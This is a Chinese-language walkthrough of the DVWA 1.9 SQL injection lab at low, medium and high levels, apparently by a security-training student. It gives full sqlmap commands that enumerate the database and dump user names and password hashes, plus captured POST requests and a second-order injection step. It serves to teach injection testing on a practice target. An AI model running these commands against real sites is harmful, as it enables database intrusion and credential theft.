本文作者:啊昊(WEB安全攻防星球学员)
LOW等级
尝试正确的提交方式:
查看地址:
http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#
查看cookie:
cookie:security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5
通过网址我们可以发现,提交方式是用Get方式的!开启sqlmap对改网址进行扫描:
C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5"
发现提示,有注入点,选择no。开始下个阶段的注入。
查看数据库:
C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --current-db
查询表:
C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --tables -D"dvwa"
查询users表中的字段:
C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low;PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --columns -D"dvwa" -T"users"
查询表中user,和passsword的信息:
C:\Python27\sqlmap>sqlmap.py -u "http://www.d.com/DVWA1.9/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low;PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --dump -D"dvwa" -T"users" -C"user,password"
得到结果,并计算出hash值:
Medium等级
正常提交请求:
网址:
http://www.d.com/DVWA-1.9/vulnerabilities/sqli/#
cookie值:
security=medium; PHPSESSID=ssgdhr8nr2s5locu7amule13q5
用第一次的方法去测试:
[CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
发现sqlmap报错。
查看数据包:
POST /DVWA-1.9/vulnerabilities/sqli/ HTTP/1.1
Host: www.d.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.d.com/DVWA-1.9/vulnerabilities/sqli/
Cookie: security=medium; PHPSESSID=ssgdhr8nr2s5locu7amule13q5
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
id=1&Submit=Submit
发现提交网址为:/DVWA-1.9/vulnerabilities/sqli/,提交的数据包为id=1&Submit=Submit。
因此在sqlmap用如下指令进行测试:
sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/" --cookie "security=medium;PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --data "id=1&Submit=Submit"
期待的结果到来了:
OK,重复LOW级别的操作就可以拿到用户的账户和密码了。
High等级
正常提交请求:
页面跳转了,难道我们的sqlmap行不通了?尝试用中级的方法,发现不到漏洞,因为页面已经跳转了,别慌,我们还有--second-order这个办法!
首先我们先抓取下数据包:
POST /DVWA-1.9/vulnerabilities/sqli/session-input.php HTTP/1.1
Host: www.d.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.d.com/DVWA-1.9/vulnerabilities/sqli/session-input.php
Cookie: security=high; PHPSESSID=ssgdhr8nr2s5locu7amule13q5
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
id=1&Submit=Submit
可以看到,这是从/session-input.php来的要去到我们之前的页面
/DVWA-1.9/vulnerabilities/sqli/
OK,可以尝试一下了。
sqlmap.py -u "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/session-input.php” --data "id=1&Submit=Submit" -p "id" --cookie "security=high;PHPSESSID=ssgdhr8nr2s5locu7amule13q5" --second-order "http://www.d.com/DVWA-1.9/vulnerabilities/sqli/"
看到这个出现,嘿嘿,接下来那就和low级别一样就好啦!
总结
sqlmap真是一款注入神器呀!!!